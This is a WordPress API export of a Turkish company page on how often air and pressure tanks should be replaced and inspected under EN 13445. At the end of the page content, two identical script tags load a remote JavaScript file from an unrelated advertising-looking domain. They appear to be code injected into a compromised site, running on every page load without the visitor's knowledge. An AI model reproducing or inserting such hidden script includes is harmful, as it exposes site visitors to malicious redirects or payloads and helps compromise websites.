{"id":846,"date":"2021-04-13T13:28:16","date_gmt":"2021-04-13T10:28:16","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hava-tanki-nedir-copy\/"},"modified":"2021-04-13T14:39:36","modified_gmt":"2021-04-13T11:39:36","slug":"hava-tanklari-ne-siklikla-degistirilmelidir","status":"publish","type":"page","link":"https:\/\/gensalimited.com.tr\/index.php\/hava-tanklari-ne-siklikla-degistirilmelidir\/","title":{"rendered":"Hava tanklar\u0131 ne s\u0131kl\u0131kla de\u011fi\u015ftirilmelidir?"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;848&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">EN 13445 Avrupa standard\u0131na uygun \u00fcretilmi\u015f hava ve bas\u0131n\u00e7 tanklar\u0131, standard\u0131n kendi i\u00e7inde uygun g\u00f6rd\u00fc\u011f\u00fc \u00fczere 10 y\u0131lda bir de\u011fi\u015ftirilmelidir. Y\u0131llar i\u00e7inde kullan\u0131lan tank korozyona maruz kalaca\u011f\u0131 i\u00e7in 10 y\u0131l\u0131 a\u015ft\u0131ktan sonra, bu tanklar bulunduklar\u0131 \u015firkete tehlike arz etmektedir. S\u00fcresi ge\u00e7ti\u011fi halde ayn\u0131 tank\u0131 kullanmaya devam etmek, kullan\u0131c\u0131n\u0131n sorumlulu\u011fundad\u0131r.<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">\u00a0<\/span><b><span lang=\"EN-US\">Hava tanklar\u0131n\u0131n bak\u0131m\u0131 ne s\u0131kl\u0131kla yap\u0131lmal\u0131d\u0131r?<\/span><\/b><\/p>\n<p class=\"Standard\"><b><span lang=\"EN-US\">\u00a0<\/span><\/b><span lang=\"EN-US\">EN 13445 Avrupa standard\u0131na uygun \u00fcretilmi\u015f hava ve bas\u0131n\u00e7 tanklar\u0131, ba\u011f\u0131ms\u0131z bir kurulu\u015f taraf\u0131ndan y\u0131lda bir kez olmak \u00fczere kontrol edilmeli ve sertifikaland\u0131r\u0131lmal\u0131d\u0131r.(T\u00dcV, TMMOB vb.)<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;848&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text] EN 13445 Avrupa standard\u0131na uygun \u00fcretilmi\u015f hava ve bas\u0131n\u00e7 tanklar\u0131, standard\u0131n kendi i\u00e7inde uygun g\u00f6rd\u00fc\u011f\u00fc \u00fczere 10 y\u0131lda bir&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-846","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/846","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=846"}],"version-history":[{"count":3,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/846\/revisions"}],"predecessor-version":[{"id":888,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/846\/revisions\/888"}],"wp:attachment":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=846"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}